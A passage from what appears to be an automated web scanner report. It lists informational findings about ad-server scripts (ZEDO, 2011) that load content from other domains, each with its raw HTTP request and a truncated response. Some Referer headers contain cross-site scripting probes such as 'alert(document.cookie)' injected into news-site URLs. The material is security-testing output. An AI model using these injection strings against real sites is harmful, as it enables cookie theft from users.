http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/

Request

GET /bar/v16-401/c5/jsc/fm.js?c=167&a=0&f=&n=1220&r=13&d=14&q=&$=&s=126&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/&z=0.9975781855173409 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(1)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFad=0; FFcat=1220,101,9

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,167,14:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "419234-82a5-4988a5a7ea280"
Vary: Accept-Encoding
X-Varnish: 1882666994
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=242
Expires: Fri, 28 Jan 2011 14:52:34 GMT
Date: Fri, 28 Jan 2011 14:48:32 GMT
Connection: close
Content-Length: 1875

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=126;var zzPat='';var zzC
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=52AF2E4&w=728&h=90&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=882519;x=3584;g=172;c=1220000167,1220000167;i=0;n=1220;1=8;2=1;s=126;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=1075159;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63723/0/cj/V12D7843BC0J-573I704K63342ADC1D6F3ADC1D6F3K82427K82131QK63359QQP0G00G0Q05BC4B4000001E/"><\/script>
...[SNIP]...

17.166. http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://c7.zedo.com
Path:	/bar/v16-401/c5/jsc/fmr.js

Issue detail

The page was loaded from a URL containing a query string:

http://c7.zedo.com/bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294

The response contains the following link to another domain:

http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/

Request

GET /bar/v16-401/c5/jsc/fmr.js?c=101&a=0&f=&n=1220&r=13&d=9&q=&$=&s=69&l=http%3A//hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/&z=0.11480318708345294 HTTP/1.1
Host: c7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.nydailynews.com/blogs70f75'%3balert(document.cookie)//84f766b9c15/jets/2011/01/live-chat-friday-noon-1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; FFgeo=5386156; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFad=0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "86257539-809a-4988a5ada3000"
Vary: Accept-Encoding
X-Varnish: 1882667040 1882666656
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=84
Expires: Fri, 28 Jan 2011 14:15:59 GMT
Date: Fri, 28 Jan 2011 14:14:35 GMT
Connection: close
Content-Length: 1870

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=69;var zzPat='';var zzCust
...[SNIP]...
f zzIdxClk == 'undefined' || zzIdxClk.length == 0) { var zzIdxClk =''; }
else { zzIdxClk = 'se=' + zzIdxClk;}
if (typeof ainfo == 'undefined' || ainfo.length == 0) { var ainfo =''; }

document.write('<script language="JavaScript" src="http://smm.sitescout.com/tag.jsp?pid=79C8ECB&w=300&h=250&rnd=%r&cm=http://xads.zedo.com/ads2/c?a=853584;x=2304;g=172;c=1220000101,1220000101;i=0;n=1220;1=8;2=1;s=69;g=172;m=82;w=47;i=0;u=INmz6woBADYAAHrQ5V4AAACH~010411;p=6;f=990638;h=922865;k=http://hpi.rotator.hadj7.adjuggler.net/servlet/ajrotator/63722/0/cj/V127BB6CB93J-573I704K63342ADC1D6F3ADC1D6F3K63704K63703QK63352QQP0G00G0Q05BC434B000016/"><\/script>
...[SNIP]...

17.167. http://common.onset.freedom.com/fi/adsense/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://common.onset.freedom.com
Path:	/fi/adsense/

Issue detail

The page was loaded from a URL containing a query string:

http://common.onset.freedom.com/fi/adsense/?scode=wrgb&placement=section

The response contains the following link to another domain:

http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab

Request

GET /fi/adsense/?scode=wrgb&placement=section HTTP/1.1
Host: common.onset.freedom.com
Proxy-Connection: keep-alive
Referer: http://www.cbs6albany.com/sections/thirdParty/iframe_footer/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A040EC0514BA68-6000015720083FE6[CE]

Response

HTTP/1.1 200 OK
Date: Fri, 28 Jan 2011 17:37:29 GMT
Server: PWS/1.7.1.2
X-Px: ms iad-agg-n23 ( iad-agg-n13), ht iad-agg-n13.panthercdn.com
Cache-Control: max-age=7200
Expires: Fri, 28 Jan 2011 17:59:54 GMT
Age: 5855
Content-Type: text/html
Vary: Accept-Encoding
Connection: keep-alive
Content-Length: 4922

function google_ad_request_done(google_ads) {

   if (google_ads.length == 0) return;
   var s = ''; var i;
   var reflink="https://adwords.google.com/select/OnsiteSignupLandingPage?client=ca-freedom_js&ref
...[SNIP]...
</div><object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000"' + ' codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0"' + ' WIDTH="' + google_ad.image_width + '" HEIGHT="' + google_ad.image_height + '">' + '<PARAM NAME="movie" VALUE="' + google_ad.image_url + '">
...[SNIP]...

17.168. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.925386450253427

The response contains the following link to another domain:

http://ib.adnxs.com/ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=' + Math.random() + '

Request

GET /bar/v16-401/d3/jsc/fm.js?c=2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.925386450253427 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; ZCBC=1; FFgeo=5386156; aps=2; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636:951,125046|0,24,1:0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1; ZFFAbh=749B826,20|1483_759#365; FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250; FFcat=826,187,14:951,2,14:826,187,9:951,2,9:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9; FFad=7:0:12:5:2:6:3:1:1:0; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:2,26,1

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFpb=1220:4f791'$951:realmedia728x90,audiencescience300x250,spectrum300x250,ibnetwork300x250;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFcat=826,187,9:951,2,9:826,187,14:951,2,14:951,11,14:951,7,9:951,7,14:826,187,7:951,7,7:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=13:6:7:0:2:6:3:1:1:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740,11#538792|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:4,26,1:2,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:2,26,1;expires=Sun, 27 Feb 2011 22:43:52 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=66
Expires: Fri, 28 Jan 2011 22:44:58 GMT
Date: Fri, 28 Jan 2011 22:43:52 GMT
Connection: close
Content-Length: 2501

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='realmedia728
...[SNIP]...
</span>")
document.write('<SCRIPT SRC="http://ib.adnxs.com/ttj?id=57040&pubclick=http://yads.zedo.com/ads2/c%3Fa=775740%3Bn=951%3Bx=2304%3Bc=951000002,951000002%3Bg=172%3Bi=6%3B1=8%3B2=1%3Bs=2%3Bg=172%3Bm=82%3Bw=47%3Bi=6%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=2%3Bss=2%3Bsi=6%3Bse=1%3Bk=&cb=' + Math.random() + '" TYPE="text/javascript">');
document.write('<\/script>
...[SNIP]...

17.169. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.24530343222431839

The response contains the following link to another domain:

http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.24530343222431839 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle&companion=Top,Right,Middle,Bottom&page=bh.heraldinteractive.com/news/mediacenter
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; PI=h1037004Za883603Zc826000390,826000390Zs280Zt127; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:826,196636|0,24,1:0,25,1:0,25,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1; ZFFAbh=749B826,20|1483_758#365; ZCBC=1; FFgeo=5386156; FFpb=1220:4f791'; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1; FFcat=826,187,9:951,2,9:951,7,9:1220,101,9; FFad=1:0:0:0

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294,2#776116|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1;expires=Sun, 27 Feb 2011 21:57:32 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,9:951,7,9:951,2,9:1220,101,9;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=2:1:0:0;expires=Sat, 29 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=170
Expires: Fri, 28 Jan 2011 22:00:22 GMT
Date: Fri, 28 Jan 2011 21:57:32 GMT
Connection: close
Content-Length: 2108

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<script src="http://content.pulse360.com/EF949BBC-E1FB-11DF-83A0-DE09EDADD848" type="text/javascript"><\/script>
...[SNIP]...

17.170. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.9864981058053672

The response contains the following link to another domain:

http://redcated/APM/iview/267856419/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883603%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=7/2&a=0&f=&n=951&r=13&d=7&q=&$=&s=2&z=0.9864981058053672 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://boston30.autochooser.com/results.asp?6bfd0%3balert(document.cookie)//cb19586ae74=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ZEDOIDA=INmz6woBADYAAHrQ5V4AAACH~010411; ZEDOIDX=29; __qca=P0-2130372027-1295906131971; aps=2; ZFFAbh=749B826,20|1483_759#365; FFgeo=5386156; FFChanCap=1463B1219,48#878391,19#878390,1#706985#736041#704705,20#878399,16#706985:1083,8#647871,7#740741#668673#648477:1099,2#702971:1174,2#686461,1#735987#661512#735993#661522#663188:1063,1#732560#653259#768798#835748#768794#834936:1194,1#765521#795614,2#758201#684991#758198#677970:951,7#538777#851294#538760#538779#877543#877544,2#776116#653213#562813#711378#776117#775740#864240#580302#653224#649953,11#538792#580303|0,1,1:0,1,1:0,1,1:1,1,1:2,1,1:0,11,1:0,11,1:1,6,1:0,12,7:0,7,2:0,6,1:0,17,1:0,24,1:0,25,2:0,24,1:0,25,2:0,24,1:0,24,1:1,24,1:0,25,2:0,24,1:1,24,1:0,24,1:0,24,1:0,24,1:0,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,26,1:0,26,1:0,26,1:1,26,1:44,26,1:32,26,1:0,26,1:0,27,2:0,26,1:2,26,1:0,26,1:0,26,1:0,26,1:1,26,1:0,27,2:0,26,1:2,26,1:0,26,1; ZCBC=1; FFcat=826,187,7:951,2,7; FFad=0:0; FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1; PI=h1037004Za883600Zc826000187,826000187Zs173Zt129

Response

HTTP/1.1 200 OK
Server: ZEDO 3G
Content-Type: application/x-javascript
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:826,196645|0,26,1:0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1;expires=Mon, 28 Feb 2011 14:24:53 GMT;path=/;domain=.zedo.com;
Set-Cookie: FFcat=826,187,7:951,7,7:951,2,7;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFad=1:0:0;expires=Sun, 30 Jan 2011 05:00:00 GMT;domain=.zedo.com;path=/;
Set-Cookie: FFCap=1463B1219,174796:933,196008,151716:305,195657:1211,145132,135220:1063,129348,129351:196636,196635:196641,196640:196643,196640:196645,196644:196641,196640:951,125046,131022,131021:196645,196644|0,26,1:1,24,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,25,1:0,27,1:0,26,1:0,27,1:14,26,1:14,26,1:0,27,1:0,27,1;expires=Mon, 28 Feb 2011 14:24:53 GMT;path=/;domain=.zedo.com;
ETag: "812b9fe5-82a5-4989a5927aac0"
Vary: Accept-Encoding
X-Varnish: 2233582065 2233582057
P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml"
Cache-Control: max-age=56
Expires: Sat, 29 Jan 2011 14:25:50 GMT
Date: Sat, 29 Jan 2011 14:24:54 GMT
Connection: close
Content-Length: 4383

// Copyright (c) 2000-2010 ZEDO Inc. All Rights Reserved.

var p9=new Image();

var zzD=window.document;

if(typeof zzuid=='undefined'){
var zzuid='unknown';}
var zzSection=2;var zzPat='';var zzCusto
...[SNIP]...
</span>")
document.write('<iframe src="http://view.atdmt.com/APM/iview/267856419/direct;wi.160;hi.600/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883603%3Bn=826%3Bx=1821%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077677%3Bh%3D1037004%3Bk=" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="160" height="600">');
document.write('<script language="JavaScript" type="text/javascript">
...[SNIP]...

17.171. http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://d7.zedo.com
Path:	/bar/v16-401/d3/jsc/fm.js

Issue detail

The page was loaded from a URL containing a query string:

http://d7.zedo.com/bar/v16-401/d3/jsc/fm.js?c=10/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.44924098439514637

The response contains the following link to another domain:

http://redcated/APM/iview/267856417/direct;wi.300;hi.250/01/'+Math.random()+'?click=http://yads.zedo.com/ads2/c%3Fa=883601%3Bn=826%3Bx=2333%3Bc=826000187,826000187%3Bg=172%3Bi=0%3B1=8%3B2=1%3Bs=173%3Bg=172%3Bm=82%3Bw=47%3Bi=0%3Bu=INmz6woBADYAAHrQ5V4AAACH~010411%3Bsn=951%3Bsc=0%3Bss=2%3Bsi=0%3Bse=1%3Bp%3D8%3Bf%3D1077676%3Bh%3D1037004%3Bk=

Request

GET /bar/v16-401/d3/jsc/fm.js?c=10/2&a=0&f=&n=951&r=13&d=9&q=&$=&s=2&z=0.44924098439514637 HTTP/1.1
Host: d7.zedo.com
Proxy-Connection: keep-alive
Referer: http://bh.heraldinteractive.com/includes/processAds.bg?position=Middle&companion=Top,Middle,Bottom&page=bh.heraldinteractive.com/business/general/marketresearch
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
